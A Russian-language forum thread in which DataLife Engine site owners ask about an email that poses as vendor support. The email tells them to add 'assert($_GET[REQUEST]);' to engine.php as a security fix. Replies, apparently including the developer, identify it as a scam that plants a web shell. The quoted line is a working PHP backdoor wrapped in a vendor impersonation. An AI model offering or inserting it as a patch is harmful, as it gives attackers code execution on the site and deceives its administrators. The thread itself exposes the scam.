pavelbv 1 Опубликовано: 24 октября 2014 Рассказать Опубликовано: 24 октября 2014 Здравствуйте. Пришло вот это - Благодарим Вас за использование на Вашем сайте нашего ПО «CMS DataLife Engine - Система управления сайтами». Уведомляем Вас о том, что силами наших специалистов на Вашем сайте была обнаружена критическая уязвимость, позволяющая злоумышленникам получить доступ к базе данных Вашего сайта из-за недостаточной фильтрации данных. По нашим данным 60% сайтов, использующих «DataLife Engine», уязвимы и подвержены взлому посредством данной уязвимости. Именно по этой причине, мы приняли решение произвести рассылку администраторам уязвимых сайтов для того, чтобы они смогли оперативно обезопасить свои сайты от противоправных действий со стороны злоумышленников. Для исправления уязвимости в текстовом редакторе откройте файл Вашего сайта: /engine/engine.php и в самое начало файла после строчки: <?php добавьте: assert($_GET[REQUEST]); С уважением,Служба поддержки «DataLife Engine» IP адрес отправителя: 46.38.63.68 И правда рассылка или развод =) ? Спасибо. Цитата Ссылка на сообщение Поделиться на других сайтах
Arhone 0 Опубликовано: 24 октября 2014 Рассказать Опубликовано: 24 октября 2014 Тоже самое только IP адрес отправителя: 162.244.33.213 Цитата Ссылка на сообщение Поделиться на других сайтах
Captain 623 Опубликовано: 24 октября 2014 Рассказать Опубликовано: 24 октября 2014 Это развод, уже десятки тем на форуме. Все баг-фиксы нужно смотреть на странице http://dle-news.ru/bags/ или нажав на главной странице админ-панели на кнопку "Проверить наличие обновлений". Цитата Ссылка на сообщение Поделиться на других сайтах
FinN73 0 Опубликовано: 24 октября 2014 Рассказать Опубликовано: 24 октября 2014 Ха-ха, классно придумано! Социальная инженерия рулит)) И ведь много людей поведутся! Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 072 Опубликовано: 25 октября 2014 Рассказать Опубликовано: 25 октября 2014 Это мошенники. Это письмо пришло не от нас и не от нашего домена. А просто было отправлено вам с вашего же сайта через обратную связь. Все патчи публикуются только на странице http://dle-news.ru/bags/ и ставить нужно патчи только с официального сайта. А это распространение шеллов для того чтобы ваш сайт можно было взломать. Тех. поддержке нет необходимости ходить по обратным связям ваших сайтов, мы обладаем E-mail клиентов, т.к. вы регистрировались на нашем сайте. И в случае выхода обновлений, вы это увидите в своей админпанели, есть для этого специальная кнопка, также официально публикуем патч на сайте, и отправляем уведомления клиентом напрямую с нашего сайта и домена, а не через обратную связь ваших сайтов. Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.